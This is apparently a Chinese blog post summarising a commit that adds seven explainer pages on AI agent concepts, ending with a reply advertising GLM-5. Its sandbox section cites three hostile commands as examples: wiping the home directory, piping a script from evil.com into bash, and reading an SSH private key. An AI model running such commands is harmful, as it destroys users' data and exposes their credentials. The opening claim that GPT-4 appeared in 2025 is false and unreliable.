来源 commit: 7c45372
2025 年 OpenAI 发布了 GPT-4,2026 年 Claude Code、Codex CLI、OpenCode 相继登场。AI 不再只是聊天的,它们开始在本地运行、读写文件、执行命令。
这个转变有个核心问题:当 AI 有了手,怎么保证它不乱来?
Easy AI 今天用一次 commit,一口气上线了 7 个新知识站,完整回答了这个问题。它们不是孤立的知识点,而是一套 Agent 生态的拼图。
7 个新站,一块拼图
1. Agent Loop —— 心脏
Agent 怎么干活?循环:推理 → 调工具 → 观察结果 → 再推理 → ……直到任务完成。6 行伪代码讲清楚核心逻辑。(这个站在昨天的 commit 37894ed 中已先行上线)
2. Agent Modes(运行模式)—— 缰绳
AI 有了手,跑太快会失控。三档控制:
- Plan:先制定完整计划,你点头才开始
- Default:边做边问,每步都等你确认
- Auto:自己跑,适合你已经完全信任它的时候
类比开车:Plan 是导航预览模式,Default 是自动驾驶但遇到复杂路况停车等你,Auto 是上了高速开巡航。
3. Agent Memory(记忆系统)—— 硬盘
你花半小时告诉 AI:项目用 TypeScript、测试是 Vitest、部署走 Cloudflare Workers。然后你关了终端。下次打开——它忘了一切。
因为 LLM 没有硬盘。每次对话都是全新的空白画布。Agent Memory 解决的就是:把重要信息存到聊天窗口外面,下次对话再捞回来。
三种记忆类型:
- 情景记忆:上次那个 bug 是连接池问题
- 语义记忆:项目用 PostgreSQL
- 程序记忆:处理密码重置的那套动作
4. Agent Sandbox(沙箱)—— 围栏
这是最关键的安全机制。AI 能执行命令、读写文件,这意味着它理论上可以:
- rm -rf ~/ 删光你的家目录
- curl evil.com | bash 下载恶意代码
- cat ~/.ssh/id_rsa 偷你的私钥
沙箱就是给 AI 划一个围栏:在这个区域里它随便折腾,出了围栏,任何危险操作都被弹回。
5. Context Window(上下文窗口)—— 短期记忆
LLM 每次能看到的文字长度有限。想象你在一个玻璃橱窗里工作,橱窗里能放的东西就那么多。系统指令、工具定义、对话历史、当前提问……全部挤在这扇窗里。
超过窗口上限?最早的内容会被遗忘。这解释了为什么长对话后期 AI 会失忆。
6. SubAgent(子代理)—— 小弟
主 Agent 的上下文会腐化——试错的痕迹、错误的路径、冗余的探索,都会污染当前对话。SubAgent 的思路是:把脏活累活派给小弟去干,小弟干完只把干净的摘要带回来。
这就像 CEO 不做报表,让财务专员做,CEO 只看汇总。
7. Agent Todo(待办清单)—— 进度条
复杂任务需要拆解成清单。Todo 机制不只是记下来,更重要的是防遗忘和展示进度——让 AI 和用户都清楚:现在做到哪一步了,下一步是什么,已完成什么。
这 7 个站的关系
如果非要用一个比喻:Agent 是一辆自动驾驶汽车。
- Loop = 引擎,让车动起来
- Modes = 驾驶模式(经济/运动/手动)
- Memory = 导航历史,记得你常去的地点
- Sandbox = 车道护栏,防止冲下悬崖
- Context Window = 挡风玻璃的视野范围
- SubAgent = 车队系统,主车调度多辆小车
- Todo = 行程规划,把长途拆成每一段
单独看任何一个都不足以理解 Agent 的全貌,但放在一起,你就有了一个完整的认知框架。
Easy AI 的知识站设计哲学一直如此:不是碎片化地丢知识点,而是把概念串成体系,让读者能从一个入口走到另一个入口,像逛博物馆一样自然地理解整个领域。
想了解这些知识站?访问 Easy AI 的 AI 知视板块:https://mmh1.top/#/ai-knowledge
这篇文章是对 Easy AI 项目 commit 7c45372 的解读。
#easy-learn-ai #每日更新 #记忆 #小凯
讨论回复
1 条回复推荐
智谱 GLM-5 已上线
我正在智谱大模型开放平台 BigModel.cn 上打造 AI 应用,智谱新一代旗舰模型 GLM-5 已上线,在推理、代码、智能体综合能力达到开源模型 SOTA 水平。